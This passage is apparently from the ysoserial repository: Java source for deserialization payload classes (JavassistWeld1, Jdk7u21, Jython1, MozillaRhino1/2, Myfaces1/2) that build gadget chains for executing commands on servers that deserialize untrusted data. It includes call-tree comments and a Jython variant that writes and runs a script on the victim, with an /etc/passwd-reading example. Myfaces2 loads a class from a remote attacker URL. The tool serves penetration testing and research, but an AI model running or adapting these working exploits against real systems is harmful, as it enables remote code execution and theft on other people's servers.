import org.jboss.weld.interceptor.reader.DefaultMethodMetadata;
import org.jboss.weld.interceptor.reader.ReflectiveClassMetadata;
import org.jboss.weld.interceptor.reader.SimpleInterceptorMetadata;
import org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator;
import org.jboss.weld.interceptor.spi.metadata.InterceptorReference;
import org.jboss.weld.interceptor.spi.metadata.MethodMetadata;
import org.jboss.weld.interceptor.spi.model.InterceptionModel;
import org.jboss.weld.interceptor.spi.model.InterceptionType;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.lang.reflect.Constructor;
import java.util.*;

/*
    by @matthias_kaiser
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest(precondition = "isApplicableJavaVersion")
@Dependencies({"javassist:javassist:3.12.1.GA", "org.jboss.weld:weld-core:1.1.33.Final",
    "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
    "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
@Authors({ Authors.MATTHIASKAISER })
public class JavassistWeld1 implements ObjectPayload<Object> {
    /**
     * Precondition named by the @PayloadTest annotation on this class.
     *
     * @return the result of JavaVersion.isAtLeast(7)
     */
    public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAtLeast(7);
    }

    /**
     * Builds a Weld InterceptorMethodHandler whose interception model binds the
     * POST_ACTIVATE lifecycle type to TemplatesImpl.newTransformer, and whose
     * InterceptorInstantiator hands back the object from Gadgets.createTemplatesImpl.
     *
     * The file carries no call chain for this payload; the POST_ACTIVATE callback is
     * presumably run while the handler is deserialized -- confirm against the
     * weld-core version listed in @Dependencies.
     *
     * @param command passed unchanged to Gadgets.createTemplatesImpl
     * @return the prepared InterceptorMethodHandler
     * @throws Exception if the reflective setup fails
     */
    public Object getObject(final String command) throws Exception {

        final Object gadget = Gadgets.createTemplatesImpl(command);

        // The model and its class metadata are both built for HashMap, matching the
        // HashMap instance passed to the handler at the end.
        InterceptionModelBuilder builder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
        ReflectiveClassMetadata metadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
        InterceptorReference interceptorReference = ClassMetadataInterceptorReference.of(metadata);

        Set<InterceptionType> s = new HashSet<InterceptionType>();
        s.add(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE);

        // DefaultMethodMetadata's (Set, MethodReference) constructor is looked up with
        // getDeclaredConstructor and made accessible before use.
        Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
        Reflections.setAccessible(defaultMethodMetadataConstructor);
        MethodMetadata methodMetadata = (MethodMetadata) defaultMethodMetadataConstructor.newInstance(s,
                MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true));

        List list = new ArrayList();
        list.add(methodMetadata);
        Map<org.jboss.weld.interceptor.spi.model.InterceptionType, List<MethodMetadata>> hashMap = new HashMap<org.jboss.weld.interceptor.spi.model.InterceptionType, List<MethodMetadata>>();

        // Interceptor metadata: POST_ACTIVATE -> [newTransformer]
        hashMap.put(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE, list);
        SimpleInterceptorMetadata simpleInterceptorMetadata = new SimpleInterceptorMetadata(interceptorReference, true, hashMap);

        builder.interceptAll().with(simpleInterceptorMetadata);

        InterceptionModel model = builder.build();

        // Target instance handed to the handler; its content is a fixed marker entry.
        HashMap map = new HashMap();
        map.put("ysoserial", "ysoserial");

        DefaultInvocationContextFactory factory = new DefaultInvocationContextFactory();

        // Whatever interceptor reference is requested, the "interceptor instance"
        // returned is the TemplatesImpl object, so the bound method runs on it.
        InterceptorInstantiator interceptorInstantiator = new InterceptorInstantiator() {

            public Object createFor(InterceptorReference paramInterceptorReference) {

                return gadget;
            }
        };

        return new InterceptorMethodHandler(map, metadata, model, interceptorInstantiator, factory);

    }


    /**
     * Command-line entry point; delegates to PayloadRunner.run for this class.
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(JavassistWeld1.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/Jdk7u21.java
================================================
package ysoserial.payloads;

import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;

import javax.xml.transform.Templates;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/*

Gadget chain that works against JRE 1.7u21 and earlier. Payload generation has
the same JRE version requirements.

See: https://gist.github.com/frohoff/24af7913611f8406eaf3

Call tree:

LinkedHashSet.readObject()
  LinkedHashSet.add()
    ...
      TemplatesImpl.hashCode() (X)
  LinkedHashSet.add()
    ...
      Proxy(Templates).hashCode() (X)
        AnnotationInvocationHandler.invoke() (X)
          AnnotationInvocationHandler.hashCodeImpl() (X)
            String.hashCode() (0)
            AnnotationInvocationHandler.memberValueHashCode() (X)
              TemplatesImpl.hashCode() (X)
      Proxy(Templates).equals()
        AnnotationInvocationHandler.invoke()
          AnnotationInvocationHandler.equalsImpl()
            Method.invoke()
              ...
                TemplatesImpl.getOutputProperties()
                  TemplatesImpl.newTransformer()
                    TemplatesImpl.getTransletInstance()
                      TemplatesImpl.defineTransletClasses()
                        ClassLoader.defineClass()
                        Class.newInstance()
                          ...
                            MaliciousClass.<clinit>()
                              ...
                                Runtime.exec()
 */

@SuppressWarnings({ "rawtypes", "unchecked" })
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies()
@Authors({ Authors.FROHOFF })
public class Jdk7u21 implements ObjectPayload<Object> {

	/**
	 * Builds the LinkedHashSet for the call tree in the comment above the class.
	 *
	 * The set holds the object from Gadgets.createTemplatesImpl followed by a
	 * Templates proxy backed by an annotation invocation handler. The statement
	 * order matters: the handler's map holds a placeholder while both elements are
	 * added to the set, and the real object is swapped in only afterwards.
	 *
	 * @param command passed unchanged to Gadgets.createTemplatesImpl
	 * @return the prepared LinkedHashSet
	 * @throws Exception if the reflective setup fails
	 */
	public Object getObject(final String command) throws Exception {
		final Object templates = Gadgets.createTemplatesImpl(command);

		// Map key whose String.hashCode() is 0 (the "(0)" entry in the call tree).
		String zeroHashCodeStr = "f5a5a608";

		// Placeholder value for now; replaced by the real object at the end.
		HashMap map = new HashMap();
		map.put(zeroHashCodeStr, "foo");

		// The handler is constructed for Override.class and its "type" field is then
		// overwritten with Templates.class via reflection.
		InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
		Reflections.setFieldValue(tempHandler, "type", Templates.class);
		Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

		LinkedHashSet set = new LinkedHashSet(); // maintain order
		set.add(templates);
		set.add(proxy);

		// Reset two TemplatesImpl fields to null after the adds above (presumably
		// populated as a side effect of them -- confirm against TemplatesImpl).
		Reflections.setFieldValue(templates, "_auxClasses", null);
		Reflections.setFieldValue(templates, "_class", null);

		map.put(zeroHashCodeStr, templates); // swap in real object

		return set;
	}

	/**
	 * Precondition named by the @PayloadTest annotation on this class.
	 *
	 * @return true when the local Java version is known and is either older than
	 *         major version 7, or major version 7 with update number 21 or lower
	 */
	public static boolean isApplicableJavaVersion() {
	    JavaVersion v = JavaVersion.getLocalVersion();
	    return v != null && (v.major < 7 || (v.major == 7 && v.update <= 21));
	}

	/**
	 * Command-line entry point; delegates to PayloadRunner.run for this class.
	 */
	public static void main(final String[] args) throws Exception {
		PayloadRunner.run(Jdk7u21.class, args);
	}

}


================================================
FILE: src/main/java/ysoserial/payloads/Jython1.java
================================================
package ysoserial.payloads;

import org.apache.commons.io.FileUtils;
import org.python.core.*;

import java.math.BigInteger;
import java.io.File;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.util.Reflections;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

/**
 * Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
 *
 * This version of Jython1 writes a python script on the victim machine and
 * executes it. The format of the parameters is:
 *
 * <local path>;<remote path>
 *
 * Where local path is the python script's location on the attack box and
 * remote path is the location where the script will be written/executed from.
 * For example:
 *
 * "/home/albino_lobster/read_etc_passwd.py;/tmp/jython1.py"
 *
 * In the above example, if "read_etc_passwd.py" simply contained the string:
 *
 * raise Exception(open('/etc/passwd', 'r').read())
 *
 * Then, when deserialized, the script will read in /etc/passwd and raise an
 * exception with its contents (which could be useful if the target returns
 * exception information).
 */

@PayloadTest(skip="non RCE")
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({ "org.python:jython-standalone:2.5.2" })
@Authors({ Authors.PWNTESTER, Authors.CSCHNEIDER4711 })
public class Jython1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {

    /**
     * Builds a PriorityQueue whose comparator is a proxy backed by a Jython
     * PyFunction wrapping hand-assembled bytecode.
     *
     * The script named by the first path is read on the generating host and its
     * text is embedded in the payload as a constant; the second path is embedded as
     * the location the bytecode opens, writes and then passes to execfile.
     *
     * @param command two paths separated by a single ';' (local path, then remote
     *                path); a path that itself contains ';' is rejected by the
     *                length check below
     * @return the prepared PriorityQueue
     * @throws IllegalArgumentException if the command does not split into exactly two parts
     * @throws Exception if the local script cannot be read or the reflective setup fails
     */
    public PriorityQueue getObject(String command) throws Exception {

        String[] paths = command.split(";");
        if (paths.length != 2) {
            throw new IllegalArgumentException("Unsupported command " + command + " " + Arrays.toString(paths));
        }

        // Set payload parameters
        // (the local script is read as UTF-8 at generation time)
        String python_code = FileUtils.readFileToString(new File(paths[0]), "UTF-8");

        // Python bytecode to write a file on disk and execute it
        // Each literal is one instruction in hex; the trailing comment gives its byte
        // offset, opcode and operand. Operand indices refer to consts/names below.
        String code =
              "740000" + //0 LOAD_GLOBAL               0 (open)
              "640100" + //3 LOAD_CONST                1 (remote path)
              "640200" + //6 LOAD_CONST                2 ('w+')
              "830200" + //9 CALL_FUNCTION             2
              "7D0000" + //12 STORE_FAST               0 (file)

              "7C0000" + //15 LOAD_FAST                0 (file)
              "690100" + //18 LOAD_ATTR                1 (write)
              "640300" + //21 LOAD_CONST               3 (python code)
              "830100" + //24 CALL_FUNCTION            1
              "01" +     //27 POP_TOP

              "7C0000" + //28 LOAD_FAST                0 (file)
              "690200" + //31 LOAD_ATTR                2 (close)
              "830000" + //34 CALL_FUNCTION            0
              "01" +     //37 POP_TOP

              "740300" + //38 LOAD_GLOBAL              3 (execfile)
              "640100" + //41 LOAD_CONST               1 (remote path)
              "830100" + //44 CALL_FUNCTION            1
              "01" +     //47 POP_TOP
              "640000" + //48 LOAD_CONST               0 (None)
              "53";      //51 RETURN_VALUE

        // Helping consts and names
        // NOTE(review): the listing above labels const 0 as None, but slot 0 here is
        // an empty PyString; it is only used as the return value.
        PyObject[] consts = new PyObject[]{new PyString(""), new PyString(paths[1]), new PyString("w+"), new PyString(python_code)};
        String[] names = new String[]{"open", "write", "close", "execfile"};

        // Generating PyBytecode wrapper for our python bytecode
        // co_code is filled in reflectively afterwards. The hex string starts with
        // 0x74 (high bit clear), so BigInteger.toByteArray() adds no leading sign byte.
        PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{ "", "" }, "noname", "<module>", 0, "");
        Reflections.setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray());

        // Create a PyFunction Invocation handler that will call our python bytecode when intercepting any method
        PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);

        // Prepare Trigger Gadget
        // The queue array and size are set reflectively rather than through add(), so
        // the comparator proxy is not invoked while the payload is being built.
        Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
        PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
        Object[] queue = new Object[] {1,1};
        Reflections.setFieldValue(priorityQueue, "queue", queue);
        Reflections.setFieldValue(priorityQueue, "size", 2);

        return priorityQueue;
    }

    /**
     * Command-line entry point; delegates to PayloadRunner.run for this class.
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(Jython1.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/MozillaRhino1.java
================================================
package ysoserial.payloads;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.mozilla.javascript.*;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import javax.management.BadAttributeValueExpException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

/*
    by @matthias_kaiser
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest( precondition = "isApplicableJavaVersion")
@Dependencies({"rhino:js:1.7R2"})
@Authors({ Authors.MATTHIASKAISER })
public class MozillaRhino1 implements ObjectPayload<Object> {

    /**
     * Builds a BadAttributeValueExpException whose "val" field holds a Rhino
     * NativeError object. The NativeError's "name" getter is bound to Context.enter,
     * its "message" getter to TemplatesImpl.newTransformer, and its prototype is a
     * NativeJavaObject wrapping the object from Gadgets.createTemplatesImpl.
     *
     * The file carries no call chain for this payload; judging by the precondition
     * name, it presumably relies on BadAttributeValueExpException.readObject using
     * the "val" field -- confirm against JavaVersion.isBadAttrValExcReadObj.
     *
     * @param command passed unchanged to Gadgets.createTemplatesImpl
     * @return the prepared BadAttributeValueExpException
     * @throws Exception if the reflective setup fails
     */
    public Object getObject(final String command) throws Exception {

        // NativeError is loaded by name and instantiated through its declared no-arg
        // constructor after making it accessible.
        Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError");
        Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor();
        Reflections.setAccessible(nativeErrorConstructor);
        IdScriptableObject idScriptableObject = (IdScriptableObject) nativeErrorConstructor.newInstance();

        // NOTE(review): no matching Context.exit() is visible in this method.
        Context context = Context.enter();

        NativeObject scriptableObject = (NativeObject) context.initStandardObjects();

        // Getter for "name" -> Context.enter
        Method enterMethod = Context.class.getDeclaredMethod("enter");
        NativeJavaMethod method = new NativeJavaMethod(enterMethod, "name");
        idScriptableObject.setGetterOrSetter("name", 0, method, false);

        // Getter for "message" -> TemplatesImpl.newTransformer
        Method newTransformer = TemplatesImpl.class.getDeclaredMethod("newTransformer");
        NativeJavaMethod nativeJavaMethod = new NativeJavaMethod(newTransformer, "message");
        idScriptableObject.setGetterOrSetter("message", 0, nativeJavaMethod, false);

        // Fetch the slot created for "name" through the non-public getSlot method.
        // The trailing argument (1) is getSlot's access-type code -- TODO confirm its
        // meaning against the Rhino version in @Dependencies.
        Method getSlot = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, int.class, int.class);
        Reflections.setAccessible(getSlot);
        Object slot = getSlot.invoke(idScriptableObject, "name", 0, 1);
        Field getter = slot.getClass().getDeclaredField("getter");
        Reflections.setAccessible(getter);

        // Overwrite that slot's getter with a MemberBox built directly around
        // Context.enter, replacing the NativeJavaMethod installed above.
        Class memberboxClass = Class.forName("org.mozilla.javascript.MemberBox");
        Constructor memberboxClassConstructor = memberboxClass.getDeclaredConstructor(Method.class);
        Reflections.setAccessible(memberboxClassConstructor);
        Object memberboxes = memberboxClassConstructor.newInstance(enterMethod);
        getter.set(slot, memberboxes);

        NativeJavaObject nativeObject = new NativeJavaObject(scriptableObject, Gadgets.createTemplatesImpl(command), TemplatesImpl.class);
        idScriptableObject.setPrototype(nativeObject);

        // The exception is constructed with null and "val" is set reflectively.
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field valField = badAttributeValueExpException.getClass().getDeclaredField("val");
        Reflections.setAccessible(valField);
        valField.set(badAttributeValueExpException, idScriptableObject);

        return badAttributeValueExpException;
    }

    /**
     * Command-line entry point; delegates to PayloadRunner.run for this class.
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(MozillaRhino1.class, args);
    }

    /**
     * Precondition named by the @PayloadTest annotation on this class.
     *
     * @return the result of JavaVersion.isBadAttrValExcReadObj()
     */
    public static boolean isApplicableJavaVersion() {
        return JavaVersion.isBadAttrValExcReadObj();
    }

}


================================================
FILE: src/main/java/ysoserial/payloads/MozillaRhino2.java
================================================
package ysoserial.payloads;

import org.mozilla.javascript.*;
import org.mozilla.javascript.tools.shell.Environment;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Method;
import java.util.Hashtable;
import java.util.Map;

/*

    Works on rhino 1.6R6 and above & doesn't depend on BadAttributeValueExpException's readObject

    Chain:

    NativeJavaObject.readObject()
      JavaAdapter.readAdapterObject()
        ObjectInputStream.readObject()
          ...
            NativeJavaObject.readObject()
              JavaAdapter.readAdapterObject()
                JavaAdapter.getAdapterClass()
                  JavaAdapter.getObjectFunctionNames()
                    ScriptableObject.getProperty()
                        ScriptableObject.get()
                          ScriptableObject.getImpl()
                            Method.invoke()
                              Context.enter()
        JavaAdapter.getAdapterClass()
          JavaAdapter.getObjectFunctionNames()
            ScriptableObject.getProperty()
              NativeJavaArray.get()
                NativeJavaObject.get()
                  JavaMembers.get()
                    Method.invoke()
                      TemplatesImpl.getOutputProperties()
                        ...

    by @_tint0

*/
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"rhino:js:1.7R2"})
@Authors({ Authors.TINT0 })
public class MozillaRhino2 implements ObjectPayload<Object> {

    /**
     * Builds the nested NativeJavaObject structure for the chain in the comment
     * above the class: an outer adapter-flagged NativeJavaObject wrapping a
     * NativeJavaArray (which holds the object from Gadgets.createTemplatesImpl),
     * whose prototype's parent scope is a second adapter-flagged NativeJavaObject
     * wrapping a ScriptableObject with a Context.enter getter.
     *
     * @param command passed unchanged to Gadgets.createTemplatesImpl
     * @return the outer NativeJavaObject
     * @throws Exception if the reflective setup fails
     */
    public Object getObject( String command) throws Exception {
        // Shared parent scope; its associatedValues table is replaced with one that
        // contains only a "ClassCache" entry created without running a constructor.
        ScriptableObject dummyScope = new Environment();
        Map<Object, Object> associatedValues = new Hashtable<Object, Object>();
        associatedValues.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
        Reflections.setFieldValue(dummyScope, "associatedValues", associatedValues);

        // MemberBox (loaded by name) wrapping Context.enter
        Object initContextMemberBox = Reflections.createWithConstructor(
            Class.forName("org.mozilla.javascript.MemberBox"),
            (Class<Object>)Class.forName("org.mozilla.javascript.MemberBox"),
            new Class[] {Method.class},
            new Object[] {Context.class.getMethod("enter")});

        // Slot "foo" on a fresh scope gets that MemberBox as its getter. The variable
        // is called makeSlot but the reflected method is accessSlot; the trailing
        // argument is its access-type code -- TODO confirm the meaning of 4 (here)
        // and 2 (below) against the Rhino version in @Dependencies.
        ScriptableObject initContextScriptableObject = new Environment();
        Method makeSlot = ScriptableObject.class.getDeclaredMethod("accessSlot", String.class, int.class, int.class);
        Reflections.setAccessible(makeSlot);
        Object slot = makeSlot.invoke(initContextScriptableObject, "foo", 0, 4);
        Reflections.setFieldValue(slot, "getter", initContextMemberBox);

        // Inner NativeJavaObject: flagged as an adapter, serialized through
        // customWriteAdapterObject, wrapping the scope prepared above.
        NativeJavaObject initContextNativeJavaObject = new NativeJavaObject();
        Reflections.setFieldValue(initContextNativeJavaObject, "parent", dummyScope);
        Reflections.setFieldValue(initContextNativeJavaObject, "isAdapter", true);
        Reflections.setFieldValue(initContextNativeJavaObject, "adapter_writeAdapterObject",
            this.getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
        Reflections.setFieldValue(initContextNativeJavaObject, "javaObject", initContextScriptableObject);

        // Prototype object: its parent scope is the inner NativeJavaObject and it has
        // a slot named "outputProperties".
        ScriptableObject scriptableObject = new Environment();
        scriptableObject.setParentScope(initContextNativeJavaObject);
        makeSlot.invoke(scriptableObject, "outputProperties", 0, 2);

        // NativeJavaArray created without a constructor; its javaObject is the
        // TemplatesImpl object rather than an array.
        NativeJavaArray nativeJavaArray = Reflections.createWithoutConstructor(NativeJavaArray.class);
        Reflections.setFieldValue(nativeJavaArray, "parent", dummyScope);
        Reflections.setFieldValue(nativeJavaArray, "javaObject", Gadgets.createTemplatesImpl(command));
        // NOTE(review): the prototype is set through the setter and again through the
        // "prototype" field; one of the two looks redundant -- confirm before changing.
        nativeJavaArray.setPrototype(scriptableObject);
        Reflections.setFieldValue(nativeJavaArray, "prototype", scriptableObject);

        // Outer NativeJavaObject: same adapter setup as the inner one, wrapping the array.
        NativeJavaObject nativeJavaObject = new NativeJavaObject();
        Reflections.setFieldValue(nativeJavaObject, "parent", dummyScope);
        Reflections.setFieldValue(nativeJavaObject, "isAdapter", true);
        Reflections.setFieldValue(nativeJavaObject, "adapter_writeAdapterObject",
            this.getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
        Reflections.setFieldValue(nativeJavaObject, "javaObject", nativeJavaArray);

        return nativeJavaObject;
    }

    /**
     * Installed as the "adapter_writeAdapterObject" method on both NativeJavaObject
     * instances built in getObject. Writes three objects to the stream in order:
     * the string "java.lang.Object", an empty String array, and the wrapped object.
     *
     * @param javaObject object to write last
     * @param out        stream to write to
     * @throws IOException if writing fails
     */
    public static void customWriteAdapterObject(Object javaObject, ObjectOutputStream out) throws IOException {
        out.writeObject("java.lang.Object");
        out.writeObject(new String[0]);
        out.writeObject(javaObject);
    }

    /**
     * Command-line entry point; delegates to PayloadRunner.run for this class.
     */
    public static void main(final String[] args) throws Exception {
        PayloadRunner.run(MozillaRhino2.class, args);
    }

}


================================================
FILE: src/main/java/ysoserial/payloads/Myfaces1.java
================================================
package ysoserial.payloads;



import javax.el.ELContext;
import javax.el.ExpressionFactory;
import javax.el.ValueExpression;
import javax.servlet.ServletContext;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;

import org.apache.myfaces.context.servlet.FacesContextImpl;
import org.apache.myfaces.context.servlet.FacesContextImplBase;
import org.apache.myfaces.el.CompositeELResolver;
import org.apache.myfaces.el.unified.FacesELContext;
import org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 *
 * ValueExpressionImpl.getValue(ELContext)
 * ValueExpressionMethodExpression.getMethodExpression(ELContext)
 * ValueExpressionMethodExpression.getMethodExpression()
 * ValueExpressionMethodExpression.hashCode()
 * HashMap<K,V>.hash(Object)
 * HashMap<K,V>.readObject(ObjectInputStream)
 *
 * Arguments:
 * - an EL expression to execute
 *
 * Requires:
 * - MyFaces
 * - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
 *
 * @author mbechler
 */
@PayloadTest(skip="Requires running MyFaces, no direct execution")
@Authors({ Authors.MBECHLER })
public class Myfaces1 implements ObjectPayload<Object>, DynamicDependencies {

    /**
     * Treats the command as an EL expression and wraps it with makeExpressionPayload.
     *
     * @param command the EL expression text
     * @return the map produced by makeExpressionPayload
     * @throws Exception if payload construction fails
     */
    public Object getObject ( String command ) throws Exception {
        final Object payload = makeExpressionPayload(command);
        return payload;
    }


    /**
     * Selects the dependency coordinates according to the "el" system property.
     *
     * @return the Apache EL list when the property is unset or "apache", the JUEL
     *         list when it is "juel"
     * @throws IllegalArgumentException for any other property value
     */
    public static String[] getDependencies () {
        final String elImpl = System.getProperty("el");

        if ( "juel".equals(elImpl) ) {
            return new String[] {
                "org.apache.myfaces.core:myfaces-impl:2.2.9", "org.apache.myfaces.core:myfaces-api:2.2.9",
                "de.odysseus.juel:juel-impl:2.2.7", "de.odysseus.juel:juel-api:2.2.7",
                "javax.servlet:javax.servlet-api:3.1.0",

                // deps for mocking the FacesContext
                "org.mockito:mockito-core:1.10.19", "org.hamcrest:hamcrest-core:1.1", "org.objenesis:objenesis:2.1"
            };
        }

        if ( elImpl != null && !"apache".equals(elImpl) ) {
            throw new IllegalArgumentException("Invalid el type " + elImpl);
        }

        return new String[] {
            "org.apache.myfaces.core:myfaces-impl:2.2.9", "org.apache.myfaces.core:myfaces-api:2.2.9",
            "org.mortbay.jasper:apache-el:8.0.27",
            "javax.servlet:javax.servlet-api:3.1.0",

            // deps for mocking the FacesContext
            "org.mockito:mockito-core:1.10.19", "org.hamcrest:hamcrest-core:1.1", "org.objenesis:objenesis:2.1"
        };
    }

    /**
     * Builds a map (via Gadgets.makeMap) of two ValueExpressionMethodExpression
     * objects: one wrapping the constant expression "${true}" and one wrapping the
     * supplied expression. Per the class comment, the expression is reached through
     * ValueExpressionMethodExpression.hashCode() during HashMap.readObject.
     *
     * @param expr EL expression text for the second entry
     * @return the map produced by Gadgets.makeMap
     */
    public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception  {
        // A FacesContextImpl with null servlet objects, given an EL context reflectively,
        // is enough to create the expressions outside a running container.
        final FacesContextImpl facesContext = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
        final ELContext context = new FacesELContext(new CompositeELResolver(), facesContext);
        Reflections.getField(FacesContextImplBase.class, "_elContext").set(facesContext, context);
        final ExpressionFactory factory = ExpressionFactory.newInstance();

        final ValueExpressionMethodExpression suppliedEntry =
            new ValueExpressionMethodExpression(factory.createValueExpression(context, expr, Object.class));
        final ValueExpressionMethodExpression constantEntry =
            new ValueExpressionMethodExpression(factory.createValueExpression(context, "${true}", Object.class));

        return Gadgets.makeMap(constantEntry, suppliedEntry);
    }


    /**
     * Command-line entry point; delegates to PayloadRunner.run for this class.
     */
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(Myfaces1.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/Myfaces2.java
================================================
package ysoserial.payloads;



import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;


/**
 *
 * ValueExpressionImpl.getValue(ELContext)
 * ValueExpressionMethodExpression.getMethodExpression(ELContext)
 * ValueExpressionMethodExpression.getMethodExpression()
 * ValueExpressionMethodExpression.hashCode()
 * HashMap<K,V>.hash(Object)
 * HashMap<K,V>.readObject(ObjectInputStream)
 *
 * Arguments:
 * - base_url:classname
 *
 * Yields:
 * - Instantiation of remotely loaded class
 *
 * Requires:
 * - MyFaces
 * - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
 *
 * @author mbechler
 */
@PayloadTest(harness="ysoserial.test.payloads.MyfacesTest", precondition = "isApplicableJavaVersion")
@Authors({ Authors.MBECHLER })
public class Myfaces2 implements ObjectPayload<Object>, DynamicDependencies {

    /**
     * Precondition named in the @PayloadTest annotation.
     *
     * @return the result of JavaVersion.isAtLeast(7)
     */
    public static boolean isApplicableJavaVersion() {
        final boolean supported = JavaVersion.isAtLeast(7);
        return supported;
    }


    /**
     * Dependency coordinates for this payload; identical to those of Myfaces1, which selects
     * them from the "el" system property.
     */
    public static String[] getDependencies () {
        final String[] shared = Myfaces1.getDependencies();
        return shared;
    }


    /**
     * Builds the EL expression for the remote-class-instantiation variant and wraps it with
     * Myfaces1.makeExpressionPayload.
     *
     * The argument is split at its LAST ':' so that the base URL may itself contain colons.
     * Both halves are inserted verbatim between single quotes in the expression text.
     *
     * @param command argument of the form {@code <base_url>:<classname>}
     * @return the object returned by Myfaces1.makeExpressionPayload
     * @throws IllegalArgumentException if command contains no ':'
     */
    public Object getObject ( String command ) throws Exception {
        final int split = command.lastIndexOf(':');
        if ( split < 0 ) {
            throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
        }

        final String url = command.substring(0, split);
        final String className = command.substring(split + 1);

        // One list-append step; the same text is repeated below.
        final String addUrl =
            "${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('" + url + "').toURL())}";

        // based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
        final StringBuilder expr = new StringBuilder(
            "${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}");

        // Original author's note: if we add fewer than the actual classloaders we end up
        // with a null entry. The list is later copied with toArray(...) into an array
        // obtained from getURLs(), hence the fixed count of 100 appends.
        for ( int added = 0; added < 100; added++ ) {
            expr.append(addUrl);
        }

        expr.append("${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')")
            .append(".toArray(request.getClass().getClassLoader().getURLs())).loadClass('")
            .append(className)
            .append("').newInstance()}");

        return Myfaces1.makeExpressionPayload(expr.toString());
    }


    /**
     * Command-line entry point; forwards this class and the arguments to PayloadRunner.run.
     */
    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(Myfaces2.class, args);
    }
}


================================================
FILE: src/main/java/ysoserial/payloads/ObjectPayload.java
================================================
